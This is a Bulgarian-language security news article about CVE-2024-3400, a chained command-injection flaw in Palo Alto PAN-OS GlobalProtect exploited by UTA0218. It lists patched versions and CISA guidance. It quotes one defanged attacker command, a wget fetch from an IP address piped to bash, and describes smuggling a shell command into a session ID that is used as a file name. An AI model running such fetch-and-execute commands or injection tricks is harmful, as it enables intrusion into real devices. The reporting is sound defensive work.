Търсене
Close this search box.

Palo Alto Networks разкри повече подробности за критичния недостатък на PAN-OS

Palo Alto Networks сподели повече подробности за критичен недостатък в сигурността на PAN-OS, който се експлоатира активно от злонамерени хакери.

Компанията описва уязвимостта, проследена като CVE-2024-3400 (CVSS score: 10.0), като „сложна“ и представляваща комбинация от две грешки във версиите PAN-OS 10.2, PAN-OS 11.0 и PAN-OS 11.1 на софтуера.

„При първата от тях услугата GlobalProtect не е валидирала в достатъчна степен формата на идентификаторите на сесиите, преди да ги съхрани. Това позволи на нападателя да съхрани празен файл с избрано от него име“, казва Чандан Б. Н., старши директор по продуктова сигурност в Palo Alto Networks.

„Вторият бъг (доверяващ се на това, че файловете са генерирани от системата) използваше имената на файловете като част от команда.“

Струва си да се отбележи, че макар нито един от проблемите да не е достатъчно критичен сам по себе си, когато са верижно свързани, те могат да доведат до неавтентифицирано изпълнение на отдалечена шел команда.

От Palo Alto Networks заявиха, че извършителят, който стои зад експлоатирането на дефекта от нулев ден, UTA0218, е извършил двуетапна атака, за да постигне изпълнение на команди на податливи устройства. Дейността се проследява под името Операция MidnightEclipse.

Както вече беше разкрито както от Volexity, така и от собственото подразделение за разузнаване на заплахи Unit 42 на компанията за мрежова сигурност, това включва изпращане на специално подготвени заявки, съдържащи командата, която трябва да бъде изпълнена, и която след това се изпълнява чрез задна врата, наречена UPSTYLE.

„Първоначалният механизъм за устойчивост, създаден от UTA0218, включваше конфигуриране на cron job, който използваше wget за извличане на полезен товар от контролиран от атакуващия URL адрес, като изходът му се записваше в stdout и се изпращаше в bash за изпълнение“, отбеляза Volexity миналата седмица.

PAN-OS Flaw Under Attack

„Нападателят е използвал този метод, за да разположи и изпълни конкретни команди и да изтегли инструменти за обратен прокси сървър, като например GOST (GO Simple Tunnel).“

Unit 42  заяви, че не е успяло да определи командите, изпълнени чрез този механизъм – wget -qO- hxxp://172.233.228[.]93/policy | bash – но прецени, че имплантът, базиран на задачи cron, вероятно е използван за извършване на дейности след експлоатирането.

„На етап 1 нападателят изпраща на GlobalProtect внимателно подготвена команда на шел вместо валиден идентификатор на сесия“, обясни Чандан. „Това води до създаване на празен файл в системата с вградена команда като име на файла, избрано от нападателя.“

„На етап 2 нищо неподозиращо планирано системно задание, което се изпълнява редовно, използва предоставеното от атакуващия име на файла в команда. Това води до изпълнение на предоставената от атакуващия команда с повишени привилегии.“

Макар че Palo Alto Networks първоначално отбеляза, че успешното използване на CVE-2024-3400 изисква да бъдат активирани конфигурациите на защитната стена за GlobalProtect gateway или GlobalProtect portal (или и двете) и телеметрията на устройствата, впоследствие компанията потвърди, че телеметрията на устройствата няма отношение към проблема.

 

Това се основава на новите открития на Bishop Fox, които откриха заобиколни пътища за използване на дефекта, така че да не се изисква включването на телеметрия в устройството, за да се проникне в него.

През последните няколко дни компанията също така разшири кръпките за дефекта извън основните версии, за да обхване и други често използвани версии за поддръжка –

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

С оглед на активната злоупотреба с CVE-2024-3400 и наличието на код за експлойт с доказана концепция (PoC), на потребителите се препоръчва да предприемат стъпки за прилагане на горещите поправки възможно най-скоро, за да се предпазят от потенциални заплахи.

Американската агенция за киберсигурност и инфраструктурна сигурност (CISA) също добави недостатъка в своя каталог на известните експлоатирани уязвимости (KEV), като нареди на федералните агенции да защитят своите устройства до 19 април 2024 г.

Според информация, споделена от Shadowserver Foundation, приблизително 22 542 устройства за защитна стена, изложени на риск в интернет, вероятно са уязвими към CVE-2024-3400. По-голямата част от устройствата се намират в САЩ, Япония, Индия, Германия, Великобритания, Канада, Австралия, Франция и Китай към 18 април 2024 г.

Palo Alto Networks

Източник: The Hacker News

Подобни публикации

18 юни 2024

Koсмосът: Последната граница за кибератаки

Неспособността да си представим – и да се подготвим за –...
18 юни 2024

Лондонските болници още не могат да се съвземат...

Няколко лондонски болници, които все още не са се справили с кибера...
17 юни 2024

Арестуваха британец от Scattered Spider

22-годишен британски гражданин, за когото се предполага, че е свърз...
17 юни 2024

Adobe с вътрешни проблеми на фона на опасения, ...

Adobe гаси пожар на два фронта заради политиката си за използване н...
17 юни 2024

Потребностите от електроенергия в центровете за...

Новото партньорство на Google с базираната в Невада компания NV Ene...
17 юни 2024

Microsoft поправи безкликова уязвимост в Outlook

Morphisec предупреждава, че една от уязвимостите, които Microsoft о...
17 юни 2024

ASUS предупреждава за проблеми при 7 рутера

ASUS пусна нова актуализация на фърмуера, която отстранява уязвимос...
Бъдете социални
Още по темата
17/06/2024

ASUS предупреждава за пробл...

ASUS пусна нова актуализация на фърмуера,...
12/06/2024

Китай е поразил поне 20 000...

Холандската служба за военно разузнаване и...
29/05/2024

Пуснат е експлойт за FortiS...

Изследователи в областта на сигурността публикуваха...
Последно добавени
18/06/2024

Koсмосът: Последната границ...

Неспособността да си представим – и...
18/06/2024

Лондонските болници още не ...

Няколко лондонски болници, които все още...
17/06/2024

Арестуваха британец от Scat...

22-годишен британски гражданин, за когото се...
Ключови думи

Абонамента е почти завършен.

На посоченият от Вас e-mail е изпратено съобщение за потвърждаване на абонамента.

Моля, проверете електронната си поща за да потвърдите.

Благодарим за доверието!